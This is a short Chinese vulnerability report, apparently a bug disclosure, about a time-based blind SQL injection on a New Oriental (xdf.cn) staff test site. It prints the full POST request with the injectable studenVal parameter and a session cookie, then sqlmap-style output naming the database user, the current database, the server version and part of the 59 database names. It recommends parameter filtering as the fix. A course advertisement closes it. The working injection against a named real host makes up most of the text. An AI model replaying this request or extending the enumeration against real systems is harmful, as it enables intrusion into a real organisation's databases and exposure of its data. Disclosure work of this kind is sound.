新东方某站点MSSQL盲注

注射点：

POST /p/Handler/ApiHandler.ashx HTTP/1.1
Content-Length: 87
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://xytest.staff.xdf.cn
Cookie: ASP.NET_SessionId=hkjmbgvondvsrk55zj1jxc45
Host: xytest.staff.xdf.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

OpType=IsValidate&studenType=3&studenVal=123456*%20--%20

参数studenVal可注入。MSSQL time blind.

current user: 'shanqibin'
current database:    'NISmember0311'
back-end DBMS: Microsoft SQL Server 2008
[11:36:03] [INFO] fetching database names
[11:36:03] [INFO] fetching number of databases
[11:36:03] [INFO] resumed: 59
[11:36:03] [INFO] resumed: A2
[11:36:03] [INFO] resumed: aaa
[11:36:03] [INFO] resumed: AD_PASSPORT_DB
[11:36:03] [INFO] resumed: API
[11:36:03] [INFO] resumed: aspnetdb
[11:36:03] [INFO] resumed: BJ20140519
[11:36:03] [INFO] resumed: BJ20140520
[11:36:03] [INFO] resumed: BJ20140606
[11:36:03] [INFO] resumed: BJ201406061400
[11:36:03] [INFO] resumed: BJ20140714
[11:36:03] [INFO] resumed: BJ20140714_001
[11:36:03] [INFO] resumed: BJ20140915
[11:36:03] [INFO] resumed: bjnis_crm
[11:36:03] [INFO] resumed: BJTEST
[11:36:03] [INFO] resumed: BJTEST_DY
[11:36:03] [INFO] resumed: bushutest
[11:36:03] [INFO] resumed: CQ0825
[11:36:03] [INFO] resumed: CQNIS0519
[11:36:03] [INFO] resumed: CS0818
[11:36:03] [INFO] resumed: DevRequire

有59个库，上面只跑了一部分。

解决方案：
参数过滤

[招生]科锐逆向工程师培训(2024年11月15日实地，远程教学同时开班, 第51期)